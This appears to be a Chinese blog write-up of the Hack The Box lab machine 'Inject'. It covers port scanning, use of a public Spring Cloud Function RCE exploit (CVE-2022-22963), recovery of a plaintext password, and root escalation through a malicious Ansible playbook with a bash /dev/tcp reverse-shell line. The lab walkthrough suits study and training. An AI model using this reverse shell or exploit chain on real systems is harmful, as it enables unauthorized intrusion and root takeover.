[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升

2025-02-26 1 0

Information Gathering

IP Address Opening Ports
10.10.11.204 TCP:22,8080

$ ip='10.10.11.204'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

LFI && Spring Cloud RCE

http://10.10.11.204:8080

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图

$ feroxbuster -u 'http://10.10.11.204:8080/'

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图1

http://10.10.11.204:8080/upload

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图2
[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图3
[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图4

https://www.cvedetails.com/cve/CVE-2022-22963/

https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit

$ python3 exp.py -u 'http://10.10.11.204:8080'

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图5

https://github.com/MartinxMax/trp00f

$ grep -iR password 2>/dev/null

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图6

Username:phil

Passowrd:DocPhillovestoInject123
[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图7

User.txt

94e7dcdca61b2d4d6d8256039e213074

Privilege Escalation:Ansible playbook

通过pspy64监控,得到/usr/local/bin/ansible-parallel执行了/opt/automation/tasks/*.yml任务

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图8playbook_1.yml 文件是一个 Ansible Playbook,它的作用是确保 webapp 服务在本地(localhost)运行,并设置为开机自启。

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图9

编写恶意yml载荷到

/opt/automation/tasks/playbook_2.yml

- hosts: localhost
  tasks:
  - name: Checking webapp service
    shell: bash -c 'bash -i >& /dev/tcp/10.10.16.28/443 0>&1'

[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升插图10

Root.txt

5e375fdba1d1771e97cf1af837801f0e

相关文章:

  1. [Meachines] [Easy] CozyHosting Spring Boot API+Cozy Cloud RCE+PostgreSQL+SS…
  2. [Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…
  3. [Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE
  4. [Vulnhub] Acid ROT13+LFI+RCE+Pcapng信息泄露权限提升
  5. [Meachines] [Easy] Pilgrimage .Git泄露+ImageMagick-LFI+binwalk-v2.3.2权限提升

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

Xeno RAT:一种具备高级功能的新型远程访问木马
Windows图形化应急分析工具-Hawkeye
[Meachines] [Easy] ScriptKiddie Msfvenom RCE+TRP00F权限提升+Shell -d 命令注入+msfco…
抓包技术->APP|小程序|PC应用|WEB&转发联动&HTTPS协议
对抗沙箱的非常规手法深度解析
2025年十大最佳DevOps工具推荐

发布评论